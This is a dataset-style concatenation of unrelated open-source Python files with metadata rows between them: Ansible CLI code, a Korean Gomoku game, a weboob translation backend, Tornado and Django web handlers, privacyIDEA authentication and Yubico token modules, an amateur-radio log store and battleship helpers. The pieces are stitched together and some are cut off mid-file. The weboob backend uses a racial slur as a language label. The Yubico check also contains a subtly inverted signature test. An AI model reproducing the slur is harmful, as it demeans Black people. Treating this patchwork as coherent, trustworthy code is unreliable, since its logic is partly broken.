# create the inventory, and filter it based on the subset specified (if any)
inventory = InventoryManager(loader=loader, sources=options.inventory)
# create the variable manager, which will be shared throughout
# the code, ensuring a consistent view of global variables
variable_manager = VariableManager(loader=loader, inventory=inventory)
if hasattr(options, 'basedir'):
if options.basedir:
variable_manager.safe_basedir = True
else:
variable_manager.safe_basedir = True
# load vars from cli options
variable_manager.extra_vars = load_extra_vars(loader=loader, options=options)
variable_manager.options_vars = load_options_vars(options, CLI.version_info(gitinfo=False))
return loader, inventory, variable_manager
@staticmethod
def get_host_list(inventory, subset, pattern='all'):
no_hosts = False
if len(inventory.list_hosts()) == 0:
# Empty inventory
if C.LOCALHOST_WARNING:
display.warning("provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'")
no_hosts = True
inventory.subset(subset)
hosts = inventory.list_hosts(pattern)
if len(hosts) == 0 and no_hosts is False:
raise AnsibleError("Specified hosts and/or --limit does not match any hosts")
return hosts
| gpl-3.0 | -3,480,482,311,501,332,000 | 46.972422 | 160 | 0.573721 | false | 4.246338 | false | false | false |
3people/dropship_project | code/Dmok.py | 1 | 5356 | import os
class Board:
SIZE = 15
def __init__(self):
self.board = [['+' for _ in range(self.SIZE)] for _ in range(self.SIZE)]
self.player1 = input("player1의 이름을 입력하시오 : ")
self.player2 = input("player2의 이름을 입력하시오 : ")
self.startgame()
def printboard(self):
"""Print board
"""
os.system("clear")
print(" "+"".join(str(x+1).center(3) for x in range(self.SIZE)))
for x in range(self.SIZE):
print(str(x+1).rjust(2), end = " ")
for y in range(self.SIZE):
print(str(self.board[x][y]).center(3), end="" if y < self.SIZE-1 else "\n")
def startgame(self):
self.board[self.SIZE//2][self.SIZE//2] = "●"
self.printboard()
while True:
while True:
y = int(input(self.player2+"의 x좌표를 입력하시오 : "))
x = int(input(self.player2+"의 y좌표를 입력하시오 : "))
if x in range(1,self.SIZE+1) and y in range(1,self.SIZE+1) and self.board[x-1][y-1] == "+":
break
else :
print("다시입력하세요")
self.board[x-1][y-1] = "○"
self.printboard()
if self.check(x-1,y-1,"○"):
print(self.player2+" win")
break;
while True:
y = int(input(self.player1+"의 x좌표를 입력하시오 : "))
x = int(input(self.player1+"의 y좌표를 입력하시오 : "))
if self.check33(x-1, y-1) :
print("쌍삼입니다\n다시입력하세요")
elif x in range(1,self.SIZE+1) and y in range(1,self.SIZE+1) and self.board[x-1][y-1] == "+":
break
else :
print("다시입력하세요")
self.board[x-1][y-1] = "●"
self.printboard()
if self.check(x-1,y-1,"●"):
print(self.player1+" win")
break;
def check33(self, x, y):
a = []
for n in range(1,5):
a.append(eval("self.check"+str(n)+"("+str(x)+","+str(y)+",\"●\")"))
if a.count(3) >= 2 or a.count(4) >= 2:
return True
else :
return False
def check(self, x, y, mark):
a = []
for n in range(1,5):
a.append(eval("self.check"+str(n)+"("+str(x)+","+str(y)+",\""+mark+"\")"))
if 5 in a or (mark == "○" and True in [x >= 6 for x in a]):
return True
else :
return False
def check1(self, x, y, mark, d = 0):
"""Check row direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check1(x-1, y, mark, 1) + self.check1(x+1, y, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check1(x-1, y, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check1(x+1, y, mark, -1)
else :
return 0
else :
return 0
def check2(self, x, y, mark, d = 0):
"""Check column diretion.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check2(x, y+1, mark, 1) + self.check2(x, y-1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check2(x, y+1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check2(x, y-1, mark, -1)
else :
return 0
else :
return 0
def check3(self, x, y, mark, d = 0):
"""Check left diagonal direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check3(x-1, y-1, mark, 1) + self.check3(x+1, y+1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check3(x-1, y-1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check3(x+1, y+1, mark, -1)
else :
return 0
else :
return 0
def check4(self, x, y, mark, d = 0):
"""Check right diagonal direction.
"""
if x in range(self.SIZE) and y in range(self.SIZE):
if d == 0:
return 1 + self.check4(x-1, y+1, mark, 1) + self.check4(x+1, y-1, mark, -1)
elif d == 1:
if self.board[x][y] == mark:
return 1 + self.check4(x-1, y+1, mark, 1)
else :
return 0
elif d == -1:
if self.board[x][y] == mark:
return 1 + self.check4(x+1, y-1, mark, -1)
else :
return 0
else :
return 0
b = Board()
| mit | -7,690,093,707,582,379,000 | 34.013514 | 109 | 0.412582 | false | 3.106715 | false | false | false |
eirmag/weboob | modules/ebonics/backend.py | 1 | 2047 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import urllib
from weboob.capabilities.translate import ICapTranslate, Translation, TranslationFail, LanguageNotSupported
from weboob.tools.backend import BaseBackend
from weboob.tools.browser import StandardBrowser
__all__ = ['EbonicsBackend']
class EbonicsBackend(BaseBackend, ICapTranslate):
NAME = 'ebonics'
MAINTAINER = u'Romain Bignon'
EMAIL = '[email protected]'
VERSION = '0.e'
LICENSE = 'AGPLv3+'
DESCRIPTION = u'English to Ebonics translation service'
BROWSER = StandardBrowser
def translate(self, lan_from, lan_to, text):
if lan_from != 'English' or lan_to != 'Nigger!':
raise LanguageNotSupported()
with self.browser:
data = {'English': text.encode('utf-8')}
doc = self.browser.location('http://joel.net/EBONICS/Translator', urllib.urlencode(data))
try:
text = doc.getroot().cssselect('div.translateform div.bubble1 div.bubblemid')[0].text
except IndexError:
raise TranslationFail()
if text is None:
raise TranslationFail()
translation = Translation(0)
translation.lang_src = unicode(lan_from)
translation.lang_dst = unicode(lan_to)
translation.text = unicode(text).strip()
return translation
| agpl-3.0 | 4,084,087,417,472,269,000 | 33.116667 | 107 | 0.686859 | false | 3.959381 | false | false | false |
jdereus/labman | labcontrol/gui/handlers/study.py | 1 | 2270 | # ----------------------------------------------------------------------------
# Copyright (c) 2017-, LabControl development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from tornado.web import authenticated, HTTPError
from tornado.escape import json_encode
from labcontrol.gui.handlers.base import BaseHandler
from labcontrol.db.study import Study
from labcontrol.db.exceptions import LabControlUnknownIdError
class StudyListingHandler(BaseHandler):
@authenticated
def get(self):
self.render('study_list.html')
class StudyListHandler(BaseHandler):
@authenticated
def get(self):
# Get all arguments that DataTables send us
res = {"data": [
[s['study_id'], s['study_title'], s['study_alias'], s['owner'],
s['num_samples']] for s in Study.list_studies()]}
self.write(res)
self.finish()
class StudyHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
self.write({'study_id': study.id,
'study_title': study.title,
'total_samples': study.num_samples})
except LabControlUnknownIdError:
self.set_status(404)
self.finish()
class StudySamplesHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
term = self.get_argument('term', None)
res = list(study.samples(term, limit=20))
self.write(json_encode(res))
except LabControlUnknownIdError:
self.set_status(404)
self.finish()
class StudySummaryHandler(BaseHandler):
@authenticated
def get(self, study_id):
try:
study = Study(int(study_id))
except LabControlUnknownIdError:
raise HTTPError(404, reason="Study %s doesn't exist" % study_id)
study_numbers = study.sample_numbers_summary
self.render('study.html', study_id=study.id,
study_title=study.title, study_numbers=study_numbers)
| bsd-3-clause | -1,625,448,089,754,203,400 | 31.428571 | 78 | 0.586784 | false | 4.180479 | false | false | false |
eBay/cronus-agent | agent/agent/lib/security/agentauth.py | 1 | 5600 | #pylint: disable=E1121,W0105
'''
Copyright 2014 eBay Software Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
Created on Feb 21, 2014
@author: biyu
'''
from agent.lib.security import UnauthorizedException, invalidAuthHandler
from pylons import request, config
import logging
import re
import base64
from decorator import decorator
from agent.lib import configutil, manifestutil
import os
import traceback
LOG = logging.getLogger(__name__)
def authorize():
'''
docorator for authorize
@parameter inSecurity: bool indicating whether incomming security need to check
'''
def validate(func, self, *args, **kwargs):
''' function that calls authrozing function'''
isAuthEnabled = True
isPkiEnabled = False
authPassed = False
try:
appGlobal = config['pylons.app_globals']
isAuthEnabled = configutil.getConfigAsBool('basicauth.local')
isPkiEnabled = (appGlobal.encryptedtokens and configutil.getConfigAsBool('pkiauth_enabled'))
except BaseException as excep:
LOG.error('Error loading auth config %s - %s' % (str(excep), traceback.format_exc(2)))
if isAuthEnabled:
if 'Authorization' not in request.headers and 'authorization' not in request.headers:
return invalidAuthHandler('Authorization header missing', {})
message = None
result = {}
# base authentication
if not isPkiEnabled:
token = ('%s:%s' % (configutil.getConfig('username.local'), configutil.getConfig('password.local')))
try:
isAuthenticated(token)
authPassed = True
except UnauthorizedException:
message = 'Please provide valid username and password'
result['scheme'] = 'base'
if not authPassed:
# pki authentication
token = appGlobal.authztoken
try:
isAuthenticated(token)
authPassed = True
except UnauthorizedException:
if isPkiEnabled:
result['scheme'] = 'pki'
user = request.headers['AuthorizationUser'] if 'AuthorizationUser' in request.headers else 'agent'
pubKey = '%s.cert' % user
if pubKey in appGlobal.encryptedtokens:
message = appGlobal.encryptedtokens[pubKey]
result['key'] = appGlobal.encryptedtokens[pubKey]
else:
message = 'Unknown AuthroizationUser %s' % user
return invalidAuthHandler(message, result)
return func(self, *args, **kwargs)
return decorator(validate)
def isAuthenticated(token):
''' check whether user name and password are right '''
message = 'Please provide valid username and password'
inHeader = None
try:
if 'authorization' in request.headers:
inHeader = request.headers['authorization']
elif 'Authorization' in request.headers:
inHeader = request.headers['Authorization']
if inHeader is not None:
base64string = base64.encodestring(token)[:-1]
match = re.match(r'\s*Basic\s*(?P<auth>\S*)$', inHeader)
if match is not None and match.group('auth') == base64string:
return True
raise UnauthorizedException(message + " Header:" + str(request.headers))
except:
raise UnauthorizedException(message + " Header:" + str(request.headers))
def buildTokenCache(authztoken):
""" build in memory cache for security tokens """
# find all pub keys in agent and encrypt the security token with them
appGlobal = config['pylons.app_globals']
pubKeyDir = os.path.join(manifestutil.manifestPath('agent'), 'agent', 'cronus', 'keys')
LOG.info('key directory %s' % pubKeyDir)
if os.path.exists(pubKeyDir):
try:
import pki
from M2Crypto import X509
pubKeyFiles = [f for f in os.listdir(pubKeyDir) if re.match(r'.*\.cert', f)]
LOG.info('key files %s' % pubKeyFiles)
for pubKeyFile in pubKeyFiles:
# reload the certs from disk
certf = open(os.path.join(pubKeyDir, pubKeyFile), 'r')
ca_cert_content = certf.read()
certf.close()
cert = X509.load_cert_string(ca_cert_content)
# pub = RSA.load_pub_key(os.path.join(pubKeyDir, pubKeyFile))
encryptedToken = pki.encrypt(cert.get_pubkey(), authztoken)
appGlobal.encryptedtokens[pubKeyFile] = encryptedToken
LOG.info('token %s=%s' % (pubKeyFile, encryptedToken))
except BaseException as excep:
LOG.error('Error loading pki keys %s - %s' % (str(excep), traceback.format_exc(2)))
| apache-2.0 | -3,431,015,109,863,174,000 | 37.895833 | 124 | 0.601964 | false | 4.505229 | true | false | false |
ctjacobs/pyqso | pyqso/log.py | 1 | 15133 | #!/usr/bin/env python3
# Copyright (C) 2013-2017 Christian Thomas Jacobs.
# This file is part of PyQSO.
# PyQSO is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyQSO is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PyQSO. If not, see <http://www.gnu.org/licenses/>.
from gi.repository import Gtk
import logging
import sqlite3 as sqlite
from pyqso.adif import AVAILABLE_FIELD_NAMES_ORDERED
class Log(Gtk.ListStore):
""" A single log inside of the whole logbook. A Log object can store multiple records. This is """
def __init__(self, connection, name):
""" Set up a new Log object.
:arg connection: An sqlite database connection.
:arg str name: The name of the log (i.e. the database table name).
"""
# The ListStore constructor needs to know the data types of the columns.
# The index is always an integer. We will assume the fields are strings.
data_types = [int] + [str]*len(AVAILABLE_FIELD_NAMES_ORDERED)
# Call the constructor of the super class (Gtk.ListStore).
Gtk.ListStore.__init__(self, *data_types)
self.connection = connection
self.name = name
return
def populate(self):
""" Remove everything in the Gtk.ListStore that is rendered already (via the TreeView), and start afresh. """
logging.debug("Populating '%s'..." % self.name)
self.add_missing_db_columns()
self.clear()
try:
records = self.records
for r in records:
liststore_entry = [r["id"]]
for field_name in AVAILABLE_FIELD_NAMES_ORDERED:
# Note: r may contain column names that are not in AVAILABLE_FIELD_NAMES_ORDERED,
# so we need to loop over and only select those that are, since the ListStore will
# expect a specific number of columns.
liststore_entry.append(r[field_name])
self.append(liststore_entry)
logging.debug("Finished populating '%s'." % self.name)
except sqlite.Error as e:
logging.error("Could not populate '%s' because of a database error." % self.name)
logging.exception(e)
return
def add_missing_db_columns(self):
""" Check whether each field name in AVAILABLE_FIELD_NAMES_ORDERED is in the database table. If not, add it
(with all entries being set to an empty string initially).
:raises sqlite.Error, IndexError: If the existing database column names could not be obtained, or missing column names could not be added.
"""
logging.debug("Adding any missing database columns...")
# Get all the column names in the current database table.
column_names = []
try:
with self.connection:
c = self.connection.cursor()
c.execute("PRAGMA table_info(%s)" % self.name)
result = c.fetchall()
for t in result:
column_names.append(t[1].upper())
except (sqlite.Error, IndexError) as e:
logging.exception(e)
logging.error("Could not obtain the database column names.")
return
for field_name in AVAILABLE_FIELD_NAMES_ORDERED:
if(not(field_name in column_names)):
try:
with self.connection:
c.execute("ALTER TABLE %s ADD COLUMN %s TEXT DEFAULT \"\"" % (self.name, field_name.lower()))
except sqlite.Error as e:
logging.exception(e)
logging.error("Could not add the missing database column '%s'." % field_name)
pass
logging.debug("Finished adding any missing database columns.")
return
def add_record(self, fields_and_data):
""" Add a record (or multiple records) to the log.
:arg fields_and_data: A list of dictionaries (or possibly just a single dictionary), with each dictionary representing a single QSO, to be added to the log.
"""
logging.debug("Adding record(s) to log...")
# If a dictionary is given, assume that we only have one record to add.
if isinstance(fields_and_data, dict):
fields_and_data = [fields_and_data]
with self.connection:
c = self.connection.cursor()
# Get all the column names in the current database table.
c.execute("PRAGMA table_info(%s)" % self.name)
column_names = c.fetchall()
# Get the index/rowid of the last inserted record in the database.
c.execute("SELECT max(id) FROM %s" % self.name)
last_index = c.fetchone()[0]
if last_index is None:
# Assume no records are currently present.
last_index = 0
# A list of all the database entries, to be inserted in one go into the database.
database_entries = []
# Construct the SQL query.
query = "INSERT INTO %s VALUES (NULL" % self.name
for i in range(len(column_names)-1): # -1 here because we don't want to count the database's 'id' column, since this is autoincremented.
query = query + ",?"
query = query + ")"
# Gather all the records (making sure that the entries of each record are in the correct order).
for r in range(len(fields_and_data)):
# What if the database columns are not necessarily in the same order as (or even exist in) AVAILABLE_FIELD_NAMES_ORDERED?
# PyQSO handles this here, but needs a separate list (called database_entry) to successfully perform the SQL query.
database_entry = []
for t in column_names:
column_name = str(t[1]) # 't' here is a tuple
if((column_name.upper() in AVAILABLE_FIELD_NAMES_ORDERED) and (column_name.upper() in list(fields_and_data[r].keys()))):
database_entry.append(fields_and_data[r][column_name.upper()])
else:
if(column_name != "id"): # Ignore the index/rowid field. This is a special case since it's not in AVAILABLE_FIELD_NAMES_ORDERED.
database_entry.append("")
database_entries.append(database_entry)
# Insert records in the database.
with self.connection:
c = self.connection.cursor()
c.executemany(query, database_entries)
# Get the indices/rowids of the newly-inserted records.
query = "SELECT id FROM %s WHERE id > %s ORDER BY id ASC" % (self.name, last_index)
c.execute(query)
inserted = c.fetchall()
# Check that the number of records we wanted to insert is the same as the number of records successfully inserted.
assert(len(inserted) == len(database_entries))
# Add the records to the ListStore as well.
for r in range(len(fields_and_data)):
liststore_entry = [inserted[r]["id"]] # Add the record's index.
field_names = AVAILABLE_FIELD_NAMES_ORDERED
for i in range(0, len(field_names)):
if(field_names[i] in list(fields_and_data[r].keys())):
liststore_entry.append(fields_and_data[r][field_names[i]])
else:
liststore_entry.append("")
self.append(liststore_entry)
logging.debug("Successfully added the record(s) to the log.")
return
def delete_record(self, index, iter=None):
""" Delete a specified record from the log. The corresponding record is also deleted from the Gtk.ListStore data structure.
:arg int index: The index of the record in the SQL database.
:arg iter: The iterator pointing to the record to be deleted in the Gtk.ListStore. If the default value of None is used, only the database entry is deleted and the corresponding Gtk.ListStore is left alone.
:raises sqlite.Error, IndexError: If the record could not be deleted.
"""
logging.debug("Deleting record from log...")
# Delete the selected row in database.
with self.connection:
c = self.connection.cursor()
query = "DELETE FROM %s" % self.name
c.execute(query+" WHERE id=?", [index])
# Delete the selected row in the Gtk.ListStore.
if(iter is not None):
self.remove(iter)
logging.debug("Successfully deleted the record from the log.")
return
def edit_record(self, index, field_name, data, iter=None, column_index=None):
""" Edit a specified record by replacing the current data in a specified field with the data provided.
:arg int index: The index of the record in the SQL database.
:arg str field_name: The name of the field whose data should be modified.
:arg str data: The data that should replace the current data in the field.
:arg iter: The iterator pointing to the record to be edited in the Gtk.ListStore. If the default value of None is used, only the database entry is edited and the corresponding Gtk.ListStore is left alone.
:arg column_index: The index of the column in the Gtk.ListStore to be edited. If the default value of None is used, only the database entry is edited and the corresponding Gtk.ListStore is left alone.
:raises sqlite.Error, IndexError: If the record could not be edited.
"""
logging.debug("Editing field '%s' in record %d..." % (field_name, index))
with self.connection:
c = self.connection.cursor()
query = "UPDATE %s SET %s" % (self.name, field_name)
query = query + "=? WHERE id=?"
c.execute(query, [data, index]) # First update the SQL database...
if(iter is not None and column_index is not None):
self.set(iter, column_index, data) # ...and then the ListStore.
logging.debug("Successfully edited field '%s' in record %d in the log." % (field_name, index))
return
def remove_duplicates(self):
""" Remove any duplicate records from the log.
:returns: The total number of duplicates, and the number of duplicates that were successfully removed. Hopefully these will be the same.
:rtype: tuple
"""
duplicates = self.get_duplicates()
if(len(duplicates) == 0):
return (0, 0) # Nothing to do here.
removed = 0 # Count the number of records that are removed. Hopefully this will be the same as len(duplicates).
iter = self.get_iter_first() # Start with the first row in the log.
prev = iter # Keep track of the previous iter (initially this will be the same as the first row in the log).
while iter is not None:
row_index = self.get_value(iter, 0) # Get the index.
if(row_index in duplicates): # Is this a duplicate row? If so, delete it.
self.delete_record(row_index, iter)
removed += 1
iter = prev # Go back to the iter before the record that was just removed and continue from there.
continue
prev = iter
iter = self.iter_next(iter) # Move on to the next row, until iter_next returns None.
return (len(duplicates), removed)
def rename(self, new_name):
""" Rename the log.
:arg str new_name: The new name for the log.
:returns: True if the renaming process is successful. Otherwise returns False.
:rtype: bool
"""
try:
with self.connection:
# First try to alter the table name in the database.
c = self.connection.cursor()
query = "ALTER TABLE %s RENAME TO %s" % (self.name, new_name)
c.execute(query)
# If the table name change was successful, then change the name attribute of the Log object too.
self.name = new_name
success = True
except sqlite.Error as e:
logging.exception(e)
success = False
return success
def get_duplicates(self):
""" Find the duplicates in the log, based on the CALL, QSO_DATE, and TIME_ON fields.
:returns: A list of indices/ids corresponding to the duplicate records.
:rtype: list
"""
duplicates = []
try:
with self.connection:
c = self.connection.cursor()
c.execute(
"""SELECT id FROM %s WHERE id NOT IN
(
SELECT MIN(id) FROM %s GROUP BY call, qso_date, time_on
)""" % (self.name, self.name))
result = c.fetchall()
for index in result:
duplicates.append(index[0]) # Get the integer from inside the tuple.
duplicates.sort() # These indices should monotonically increasing, but let's sort the list just in case.
except (sqlite.Error, IndexError) as e:
logging.exception(e)
return duplicates
def get_record_by_index(self, index):
""" Return a record with a given index in the log.
:arg int index: The index of the record in the SQL database.
:returns: The desired record, represented by a dictionary of field-value pairs.
:rtype: dict
:raises sqlite.Error: If the record could not be retrieved from the database.
"""
with self.connection:
c = self.connection.cursor()
query = "SELECT * FROM %s WHERE id=?" % self.name
c.execute(query, [index])
return c.fetchone()
@property
def records(self):
""" Return a list of all the records in the log.
:returns: A list of all the records in the log. Each record is represented by a dictionary.
:rtype: dict
:raises sqlite.Error: If the records could not be retrieved from the database.
"""
with self.connection:
c = self.connection.cursor()
c.execute("SELECT * FROM %s" % self.name)
return c.fetchall()
@property
def record_count(self):
""" Return the total number of records in the log.
:returns: The total number of records in the log.
:rtype: int
:raises sqlite.Error: If the record count could not be determined due to a database error.
"""
with self.connection:
c = self.connection.cursor()
c.execute("SELECT Count(*) FROM %s" % self.name)
return c.fetchone()[0]
| gpl-3.0 | -7,163,945,879,374,536,000 | 44.308383 | 214 | 0.606489 | false | 4.297927 | false | false | false |
jalr/privacyidea | privacyidea/lib/tokens/yubicotoken.py | 1 | 7718 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# 2016-04-04 Cornelius Kölbel <[email protected]>
# Use central yubico_api_signature function
# 2015-01-28 Rewrite during flask migration
# Change to use requests module
# Cornelius Kölbel <[email protected]>
#
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """
This is the implementation of the yubico token type.
Authentication requests are forwarded to the Yubico Cloud service YubiCloud.
The code is tested in tests/test_lib_tokens_yubico
"""
import logging
from privacyidea.lib.decorators import check_token_locked
import traceback
import requests
from privacyidea.api.lib.utils import getParam
from privacyidea.lib.config import get_from_config
from privacyidea.lib.log import log_with
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.tokens.yubikeytoken import (yubico_check_api_signature,
yubico_api_signature)
import os
import binascii
YUBICO_LEN_ID = 12
YUBICO_LEN_OTP = 44
YUBICO_URL = "https://api.yubico.com/wsapi/2.0/verify"
DEFAULT_CLIENT_ID = 20771
DEFAULT_API_KEY = "9iE9DRkPHQDJbAFFC31/dum5I54="
optional = True
required = False
log = logging.getLogger(__name__)
class YubicoTokenClass(TokenClass):
def __init__(self, db_token):
TokenClass.__init__(self, db_token)
self.set_type(u"yubico")
self.tokenid = ""
@staticmethod
def get_class_type():
return "yubico"
@staticmethod
def get_class_prefix():
return "UBCM"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or string
"""
res = {'type': 'yubico',
'title': 'Yubico Token',
'description': 'Yubikey Cloud mode: Forward authentication '
'request to YubiCloud.',
'init': {'page': {'html': 'yubicotoken.mako',
'scope': 'enroll', },
'title': {'html': 'yubicotoken.mako',
'scope': 'enroll.title'}
},
'config': {'page': {'html': 'yubicotoken.mako',
'scope': 'config'},
'title': {'html': 'yubicotoken.mako',
'scope': 'config.title'}
},
'user': ['enroll'],
# This tokentype is enrollable in the UI for...
'ui_enroll': ["admin", "user"],
'policy' : {},
}
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
tokenid = getParam(param, "yubico.tokenid", required)
if len(tokenid) < YUBICO_LEN_ID:
log.error("The tokenid needs to be {0:d} characters long!".format(YUBICO_LEN_ID))
raise Exception("The Yubikey token ID needs to be {0:d} characters long!".format(YUBICO_LEN_ID))
if len(tokenid) > YUBICO_LEN_ID:
tokenid = tokenid[:YUBICO_LEN_ID]
self.tokenid = tokenid
# overwrite the maybe wrong lenght given at the command line
param['otplen'] = 44
TokenClass.update(self, param)
self.add_tokeninfo("yubico.tokenid", self.tokenid)
@log_with(log)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
Here we contact the Yubico Cloud server to validate the OtpVal.
"""
res = -1
apiId = get_from_config("yubico.id", DEFAULT_CLIENT_ID)
apiKey = get_from_config("yubico.secret", DEFAULT_API_KEY)
yubico_url = get_from_config("yubico.url", YUBICO_URL)
if apiKey == DEFAULT_API_KEY or apiId == DEFAULT_CLIENT_ID:
log.warning("Usage of default apiKey or apiId not recommended!")
log.warning("Please register your own apiKey and apiId at "
"yubico website!")
log.warning("Configure of apiKey and apiId at the "
"privacyidea manage config menu!")
tokenid = self.get_tokeninfo("yubico.tokenid")
if len(anOtpVal) < 12:
log.warning("The otpval is too short: {0!r}".format(anOtpVal))
elif anOtpVal[:12] != tokenid:
log.warning("The tokenid in the OTP value does not match "
"the assigned token!")
else:
nonce = binascii.hexlify(os.urandom(20))
p = {'nonce': nonce,
'otp': anOtpVal,
'id': apiId}
# Also send the signature to the yubico server
p["h"] = yubico_api_signature(p, apiKey)
try:
r = requests.post(yubico_url,
data=p)
if r.status_code == requests.codes.ok:
response = r.text
elements = response.split()
data = {}
for elem in elements:
k, v = elem.split("=", 1)
data[k] = v
result = data.get("status")
return_nonce = data.get("nonce")
# check signature:
signature_valid = yubico_check_api_signature(data, apiKey)
if signature_valid:
log.error("The hash of the return from the Yubico "
"Cloud server does not match the data!")
if nonce != return_nonce:
log.error("The returned nonce does not match "
"the sent nonce!")
if result == "OK":
res = 1
if nonce != return_nonce or not signature_valid:
log.warning("Nonce and Hash do not match.")
res = -2
else:
# possible results are listed here:
# https://github.com/Yubico/yubikey-val/wiki/ValidationProtocolV20
log.warning("failed with {0!r}".format(result))
except Exception as ex:
log.error("Error getting response from Yubico Cloud Server"
" (%r): %r" % (yubico_url, ex))
log.debug("{0!s}".format(traceback.format_exc()))
return res
| agpl-3.0 | -2,784,637,375,835,404,300 | 36.818627 | 108 | 0.552301 | false | 3.882738 | true | false | false |
cachance7/BattleQuip | battlequip/util.py | 1 | 2470 | import collections
import re
def namedtuple_with_defaults(typename, field_names, default_values=[]):
T = collections.namedtuple(typename, field_names)
T.__new__.__defaults__ = (None,) * len(T._fields)
if isinstance(default_values, collections.Mapping):
prototype = T(**default_values)
else:
prototype = T(*default_values)
T.__new__.__defaults__ = tuple(prototype)
return T
# Immutable battleship coordinate class
def _coord_as_string(self):
return chr(self.row + 65) + str(self.col + 1)
Coord = namedtuple_with_defaults('Coord', ['row', 'col'])
Coord.__str__ = _coord_as_string
Status = namedtuple_with_defaults('Status', ['game_status', 'my_turn'])
Attack = namedtuple_with_defaults('Attack', ['coord', 'hit', 'sunk'])
class InvalidCoordException(Exception):
def __init__(self, message):
super(InvalidCoordException, self).__init__()
self.message = message
class InvalidPositionException(Exception):
def __init__(self, message):
super(InvalidPositionException, self).__init__()
self.message = message
def make_coord(*raw_coord):
if len(raw_coord) == 1:
return _make_coord(raw_coord[0])
elif len(raw_coord) == 2:
return _make_coord(raw_coord)
def _make_coord(raw_coord):
if isinstance(raw_coord, Coord):
return raw_coord
elif isinstance(raw_coord, tuple):
# coord tuple must correspond to zero-based matrix (row, column)
if len(raw_coord) < 2:
raise InvalidCoordException("coord tuple must have 2 elements")
elif isinstance(raw_coord[0], str):
return make_coord(raw_coord[0] + str(raw_coord[1]))
return Coord(raw_coord[0], raw_coord[1])
elif isinstance(raw_coord, str):
# coord string is alpha & 1-based like 'B3' or 'c10'
if len(raw_coord) < 2:
raise InvalidCoordException("coord string must have 2+ elements")
row = raw_coord[0]
col = raw_coord[1:]
if re.match('[a-zA-Z]', row):
row = ord(row.upper()) - 65
else:
raise InvalidCoordException("coord elm 1 must be one alpha char")
try:
col = int(col) - 1
if col < 0:
raise Error
except:
raise InvalidCoordException("coord elm 2 must be column number >= 1")
return Coord(row, col)
else:
raise InvalidCoordException("Invalid format: " + type(raw_coord))
| mit | -7,643,095,019,502,245,000 | 33.305556 | 81 | 0.615385 | false | 3.736762 | false | false | false |
m16Takahiro/kakeibo | kakeibo/settings.py | 1 | 3863 | """
Django settings for kakeibo project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import json
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
try:
with open(BASE_DIR + '/config/secret.json', 'r') as jsonfile:
dict_ = json.load(jsonfile)
SECRET_KEY = dict_['secret_key']
